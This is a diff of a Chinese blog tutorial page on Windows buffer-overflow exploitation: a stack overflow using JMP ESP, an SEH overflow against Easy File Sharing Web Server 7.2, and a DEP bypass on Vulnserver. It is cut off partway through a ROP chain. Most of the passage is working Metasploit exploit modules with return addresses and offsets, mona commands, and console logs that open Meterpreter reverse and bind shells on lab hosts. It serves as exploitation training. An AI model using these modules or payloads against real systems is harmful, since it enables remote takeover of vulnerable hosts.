 <li>任意非00的指令覆盖buffer和EBP</li>
 <li>从程序已经加载的dll中获取他们的jmp esp指令地址。</li>
 <li>使用jmp esp的指令地址覆盖ReturnAddress</li>
@@ -518,7 +519,8 @@
 <li>查找JMP ESP指令的地址<br>在这里选择了ws2_32.dll作为对象，通过Metasploit的msfbinscan进行搜索<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/%E5%9B%BE%E7%89%8711.png" alt></li>
 </ol>
 <h2 id="自动化攻击"><a href="#自动化攻击" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Metasploit3</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">  <span class="keyword">super</span>(update_info(info,</span><br><span class="line">    <span class="string">'Name'</span> 		=&gt; <span class="string">'Stack Based Buffer Overflow Example'</span>,</span><br><span class="line">    <span class="string">'Description'</span> 	=&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">      			    Stack Based Overflow Example Application Exploitation Module</span></span><br><span class="line"><span class="string">    			   &#125;</span>,</span><br><span class="line">    <span class="string">'Platform'</span> 		=&gt; <span class="string">'Windows'</span>,</span><br><span class="line">    <span class="string">'Author'</span> 		=&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line">    <span class="string">'Payload'</span> 		=&gt;</span><br><span class="line">      			   &#123;</span><br><span class="line">        		   <span class="string">'space'</span> =&gt; <span class="number">400</span>,</span><br><span class="line">                           <span class="string">'BadChars'</span> =&gt; <span class="string">"\x00\xff"</span></span><br><span class="line">                      	   &#125;,</span><br><span class="line">    <span class="string">'Targets'</span>  		=&gt;</span><br><span class="line">      			   [</span><br><span class="line">        		     [</span><br><span class="line">			      <span class="string">'Windows XP SP3'</span>,</span><br><span class="line">			      &#123;<span class="string">'Ret'</span> =&gt; <span class="number">0x71a22b53</span>, <span class="string">'Offset'</span> =&gt; <span class="number">520</span>&#125;</span><br><span class="line">			     ]</span><br><span class="line">      			   ],</span><br><span class="line">     <span class="string">'DisclosureDate'</span> =&gt; <span class="string">'2019-05-25'</span></span><br><span class="line">  ))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    buf = make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    buf = buf + [target[<span class="string">'Ret'</span>]].pack(<span class="string">'V'</span>) + make_nops(<span class="number">20</span>) + payload.encoded</span><br><span class="line">    sock.put(buf)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">   <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
-<figure class="highlight subunit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/bof_attack</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rport 1000</span><br><span class="line">rport =&gt; 1000</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:4444 -&gt; 192.168.31.114:1062) at 2019<span class="string">-07</span><span class="string">-10</span> 16:38:51 <span class="string">+0800</span></span><br><span class="line"></span><br><span class="line">meterpreter &gt; ls</span><br><span class="line">Listing: C:\Documents and Settings\Administrator</span><br><span class="line">================================================</span><br><span class="line"></span><br><span class="line">Mode              Size     Type  Last modified              Name</span><br><span class="line">----              ----     ----  -------------              ----</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Application Data</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Cookies</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Favorites</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Local Settings</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  My Documents</span><br><span class="line">100666/rw-rw-rw-  1048576  fil   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  NTUSER.DAT</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  NetHood</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  PrintHood</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Recent</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  SendTo</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  Templates</span><br><span class="line">100777/rwxrwxrwx  26665    fil   2019<span class="string">-05</span><span class="string">-28</span> 14:59:10 <span class="string">+0800</span>  bof-server.exe</span><br><span class="line">100666/rw-rw-rw-  1024     fil   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  ntuser.dat.LOG</span><br><span class="line">100666/rw-rw-rw-  178      fil   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  ntuser.ini</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-29</span> 10:49:26 <span class="string">+0800</span>  vulnserver</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  「开始」菜单</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019<span class="string">-05</span><span class="string">-14</span> 09:54:43 <span class="string">+0800</span>  桌面</span><br><span class="line"></span><br><span class="line">meterpreter &gt;</span><br></pre></td></tr></table></figure>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/bof_attack</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; set rport 1000</span><br><span class="line">rport =&gt; 1000</span><br><span class="line">msf5 exploit(windows/yanhan/bof_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:4444 -&gt; 192.168.31.114:1062) at 2019-07-10 16:38:51 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; ls</span><br><span class="line">Listing: C:\Documents and Settings\Administrator</span><br><span class="line">================================================</span><br><span class="line"></span><br><span class="line">Mode              Size     Type  Last modified              Name</span><br><span class="line">----              ----     ----  -------------              ----</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  Application Data</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  Cookies</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  Favorites</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  Local Settings</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  My Documents</span><br><span class="line">100666/rw-rw-rw-  1048576  fil   2019-05-14 09:54:43 +0800  NTUSER.DAT</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  NetHood</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  PrintHood</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  Recent</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  SendTo</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  Templates</span><br><span class="line">100777/rwxrwxrwx  26665    fil   2019-05-28 14:59:10 +0800  bof-server.exe</span><br><span class="line">100666/rw-rw-rw-  1024     fil   2019-05-14 09:54:43 +0800  ntuser.dat.LOG</span><br><span class="line">100666/rw-rw-rw-  178      fil   2019-05-14 09:54:43 +0800  ntuser.ini</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-29 10:49:26 +0800  vulnserver</span><br><span class="line">40555/r-xr-xr-x   0        dir   2019-05-14 09:54:43 +0800  「开始」菜单</span><br><span class="line">40777/rwxrwxrwx   0        dir   2019-05-14 09:54:43 +0800  桌面</span><br><span class="line"></span><br><span class="line">meterpreter &gt;</span><br></pre></td></tr></table></figure>
+<hr>
 <h1 id="0x02-基于SEH的栈溢出"><a href="#0x02-基于SEH的栈溢出" class="headerlink" title="0x02 基于SEH的栈溢出"></a>0x02 基于SEH的栈溢出</h1><blockquote>
 <p><strong>目标程序</strong> Easy File Sharing Web Server 7.2</p>
 <p><strong>漏洞点</strong><br>在处理请求时存在漏洞——一个恶意的请求头部（HEAD或GET）就可以引起缓冲区溢出，从而改写SEH链的地址。</p>
@@ -526,10 +528,10 @@
 <p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" alt></p>
 </blockquote>
 <h2 id="确定溢出点的位置-1"><a href="#确定溢出点的位置-1" class="headerlink" title="确定溢出点的位置"></a>确定溢出点的位置</h2><ol>
-<li>生成字符序列<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create<span class="selector-class">.rb</span> -l <span class="number">10000</span> &gt; <span class="selector-tag">a</span>.txt</span><br><span class="line">python -c <span class="string">"print(' HTTP/1.0\r\n\r\n')"</span> &gt; <span class="selector-tag">b</span>.txt</span><br><span class="line">cat <span class="selector-tag">a</span><span class="selector-class">.txt</span> <span class="selector-tag">b</span><span class="selector-class">.txt</span> &gt; c.txt</span><br></pre></td></tr></table></figure>
+<li>生成字符序列<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 10000 &gt; a.txt</span><br><span class="line">python -c &quot;print(&apos; HTTP/1.0\r\n\r\n&apos;)&quot; &gt; b.txt</span><br><span class="line">cat a.txt b.txt &gt; c.txt</span><br></pre></td></tr></table></figure>
 </li>
 </ol>
-<p>删除cat造成的多余字符0x0a<br><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim -bz.txt</span><br><span class="line"><span class="comment"># In Vim</span></span><br><span class="line"><span class="symbol">:%</span>!xxd</span><br><span class="line"><span class="comment"># After editing, use the instruction below to save</span></span><br><span class="line"><span class="symbol">:%</span>!xxd -r</span><br></pre></td></tr></table></figure></p>
+<p>删除cat造成的多余字符0x0a<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim -bz.txt</span><br><span class="line"># In Vim</span><br><span class="line">:%!xxd</span><br><span class="line"># After editing, use the instruction below to save</span><br><span class="line">:%!xxd -r</span><br></pre></td></tr></table></figure></p>
 <ol start="2">
 <li>构造SEH链</li>
 </ol>
@@ -542,7 +544,7 @@
 <li>计算偏移量<br>计算catch块偏移量&amp;计算下一条SEH记录偏移量</li>
 </ol>
 <h2 id="寻找PPR"><a href="#寻找PPR" class="headerlink" title="寻找PPR"></a>寻找PPR</h2><ol>
-<li>使用mona寻找<br>需要POP/POP/RET指令的地址来载入下一条SEH记录的地址，并跳转到攻击载荷<figure class="highlight diff"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="addition">!mona modules</span></span><br><span class="line"><span class="addition">!mona seh</span></span><br></pre></td></tr></table></figure>
+<li>使用mona寻找<br>需要POP/POP/RET指令的地址来载入下一条SEH记录的地址，并跳转到攻击载荷<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">!mona modules</span><br><span class="line">!mona seh</span><br></pre></td></tr></table></figure>
 </li>
 </ol>
 <h2 id="自动化攻击-1"><a href="#自动化攻击-1" class="headerlink" title="自动化攻击"></a>自动化攻击</h2><ol>
@@ -550,9 +552,10 @@
 <figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">require</span> <span class="string">'msf/core'</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">MetasploitModule</span> &lt; Msf::Exploit::<span class="title">Remote</span></span></span><br><span class="line">  Rank = NormalRanking</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Remote::Tcp</span><br><span class="line">  <span class="keyword">include</span> Msf::Exploit::Seh</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">initialize</span><span class="params">(info = &#123;&#125;)</span></span></span><br><span class="line">    <span class="keyword">super</span>(update_info(info,</span><br><span class="line">      <span class="string">'Name'</span>            =&gt; <span class="string">'Easy File Sharing HTTP Server 7.2 SEH Overflow'</span>,</span><br><span class="line">      <span class="string">'Description'</span>     =&gt; <span class="string">%q&#123;</span></span><br><span class="line"><span class="string">        This Module Demonstrate SEH based overflow example</span></span><br><span class="line"><span class="string">      &#125;</span>,</span><br><span class="line">      <span class="string">'Author'</span>          =&gt; <span class="string">'yanhan'</span>,</span><br><span class="line"></span><br><span class="line">      <span class="string">'Payload'</span>         =&gt;</span><br><span class="line">        	&#123;</span><br><span class="line">          		<span class="string">'Space'</span>       =&gt; <span class="number">390</span>,</span><br><span class="line">          		<span class="string">'BadChars'</span>    =&gt; <span class="string">"\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"</span></span><br><span class="line">        	&#125;,</span><br><span class="line">      <span class="string">'Platform'</span>      =&gt; <span class="string">'Windows'</span>,</span><br><span class="line">      <span class="string">'Targets'</span>       =&gt;</span><br><span class="line">         		 [</span><br><span class="line">            		   [</span><br><span class="line">              		   <span class="string">'Easy File Sharing 7.2 HTTP'</span>,</span><br><span class="line">              			&#123;</span><br><span class="line">                		<span class="string">'Ret'</span>       =&gt; <span class="number">0x10022fd7</span>,</span><br><span class="line">                		<span class="string">'Offset'</span>    =&gt; <span class="number">4061</span></span><br><span class="line">              			&#125;</span><br><span class="line">            		   ]</span><br><span class="line">          		 ],</span><br><span class="line">      <span class="string">'DisclosureDate'</span>  =&gt; <span class="string">'2019-01-16'</span>,</span><br><span class="line">  ))</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">exploit</span></span></span><br><span class="line">    connect</span><br><span class="line">    weapon = <span class="string">"HEAD "</span></span><br><span class="line">    weapon &lt;&lt; make_nops(target[<span class="string">'Offset'</span>])</span><br><span class="line">    weapon &lt;&lt; generate_seh_record(target[<span class="string">'Ret'</span>])</span><br><span class="line">    weapon &lt;&lt; make_nops(<span class="number">20</span>)</span><br><span class="line">    weapon &lt;&lt; payload.encoded</span><br><span class="line">    weapon &lt;&lt; <span class="string">" HTTP/1.0\r\n\r\n"</span></span><br><span class="line">    sock.put(weapon)</span><br><span class="line">    handler</span><br><span class="line">    disconnect</span><br><span class="line">   <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>
 </li>
 <li><p>exploit</p>
-<figure class="highlight gams"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/seh_attack</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; <span class="keyword">set</span> rhosts <span class="comment">192.168.31.114</span></span><br><span class="line">rhosts <span class="comment">=&gt; 192.168.31.114</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) &gt; set rport 80</span></span><br><span class="line">rport <span class="comment">=&gt; 80</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">reverse TCP handler on 192.168.31.84:4444</span></span><br><span class="line">[*] Exploit <span class="comment">completed, but no session was created.</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) &gt; set payload windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">payload <span class="comment">=&gt; windows</span>/meterpreter/<span class="comment">bind_tcp</span></span><br><span class="line">msf5 <span class="comment">exploit(windows</span>/yanhan/<span class="comment">seh_attack) &gt; exploit</span></span><br><span class="line"></span><br><span class="line">[*] Started <span class="comment">bind TCP handler against 192.168.31.114:4444</span></span><br><span class="line">[*] Sending <span class="comment">stage (179779 bytes) to 192.168.31.114</span></span><br><span class="line">[*] Meterpreter <span class="comment">session 1 opened (192.168.31.84:46601 -&gt; 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800</span></span><br><span class="line"></span><br><span class="line">meterpreter <span class="comment">&gt; getuid</span></span><br><span class="line">Server <span class="comment">username: WHU-3E3EECEBFD1\Administrator</span></span><br></pre></td></tr></table></figure>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">msf5 &gt; use exploit/windows/yanhan/seh_attack</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set rhosts 192.168.31.114</span><br><span class="line">rhosts =&gt; 192.168.31.114</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set rport 80</span><br><span class="line">rport =&gt; 80</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.31.84:4444</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; set payload windows/meterpreter/bind_tcp</span><br><span class="line">payload =&gt; windows/meterpreter/bind_tcp</span><br><span class="line">msf5 exploit(windows/yanhan/seh_attack) &gt; exploit</span><br><span class="line"></span><br><span class="line">[*] Started bind TCP handler against 192.168.31.114:4444</span><br><span class="line">[*] Sending stage (179779 bytes) to 192.168.31.114</span><br><span class="line">[*] Meterpreter session 1 opened (192.168.31.84:46601 -&gt; 192.168.31.114:4444) at 2019-07-10 16:43:47 +0800</span><br><span class="line"></span><br><span class="line">meterpreter &gt; getuid</span><br><span class="line">Server username: WHU-3E3EECEBFD1\Administrator</span><br></pre></td></tr></table></figure>
 </li>
 </ol>
+<hr>
 <h1 id="0x03-绕过DEP"><a href="#0x03-绕过DEP" class="headerlink" title="0x03 绕过DEP"></a>0x03 绕过DEP</h1><blockquote>
 <p><strong>目标程序</strong> <a href="http://www.thegreycorner.com/2010/12/introducing-vulnserver.html" target="_blank" rel="noopener">Introducing Vulnserver</a><br><strong>使用</strong> vulnserver.exe 6666<br><strong>漏洞点</strong> <img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" alt></p>
 </blockquote>
@@ -560,7 +563,7 @@
 <h2 id="计算偏移量"><a href="#计算偏移量" class="headerlink" title="计算偏移量"></a>计算偏移量</h2><p><code>&#39;TRUN .&#39;+make_nops(target[&#39;Offset&#39;])</code><br>Immunity附加进程之后，在服务端发送3000个字符，计算偏移</p>
 <h2 id="创建ROP链"><a href="#创建ROP链" class="headerlink" title="创建ROP链"></a>创建ROP链</h2><p><code>!mona rop -m *.dll -cp nonull</code><br><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################################################################################</span></span><br><span class="line"></span><br><span class="line">Register setup <span class="keyword">for</span> VirtualProtect() <span class="symbol">:</span></span><br><span class="line">--------------------------------------------</span><br><span class="line"> EAX = NOP (<span class="number">0x90909090</span>)</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = ReturnTo (ptr to jmp esp)</span><br><span class="line"> ESI = ptr to VirtualProtect()</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> --- alternative chain ---</span><br><span class="line"> EAX = ptr to &amp;VirtualProtect()</span><br><span class="line"> ECX = lpOldProtect (ptr to W address)</span><br><span class="line"> EDX = NewProtect (<span class="number">0x40</span>)</span><br><span class="line"> EBX = dwSize</span><br><span class="line"> ESP = lPAddress (automatic)</span><br><span class="line"> EBP = POP (skip <span class="number">4</span> bytes)</span><br><span class="line"> ESI = ptr to JMP [EAX]</span><br><span class="line"> EDI = ROP NOP (RETN)</span><br><span class="line"> + place ptr to <span class="string">"jmp esp"</span> on stack, below PUSHAD</span><br><span class="line">--------------------------------------------</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ROP Chain <span class="keyword">for</span> VirtualProtect() [(XP/<span class="number">2003</span> Server <span class="keyword">and</span> up)] <span class="symbol">:</span></span><br><span class="line">----------------------------------------------------------</span><br><span class="line"></span><br><span class="line">*** [ Ruby ] ***</span><br><span class="line"></span><br><span class="line">  <span class="function"><span class="keyword">def</span> <span class="title">create_rop_chain</span><span class="params">()</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># rop chain generated with mona.py - www.corelan.be</span></span><br><span class="line">    rop_gadgets =</span><br><span class="line">    [</span><br><span class="line">      <span class="number">0x77dabf34</span>,  <span class="comment"># POP ECX # RETN [ADVAPI32.dll]</span></span><br><span class="line">      <span class="number">0x6250609c</span>,  <span class="comment"># ptr to &amp;VirtualProtect() [IAT essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77d1927f</span>,  <span class="comment"># MOV EAX,DWORD PTR DS:[ECX] # RETN [USER32.dll]</span></span><br><span class="line">      <span class="number">0x7c96d192</span>,  <span class="comment"># XCHG EAX,ESI # RETN [ntdll.dll]</span></span><br><span class="line">      <span class="number">0x77bef671</span>,  <span class="comment"># POP EBP # RETN [msvcrt.dll]</span></span><br><span class="line">      <span class="number">0x625011af</span>,  <span class="comment"># &amp; jmp esp [essfunc.dll]</span></span><br><span class="line">      <span class="number">0x77e9ad22</span>,  <span class="comment"># POP EAX # RETN [RPCRT4.dll]</span></span><br><span class="line">      <span class="number">0xfffffdff</span>,  <span class="comment"># Value to negate, will become 0x00000201</span></span><br><span class="line">      <span 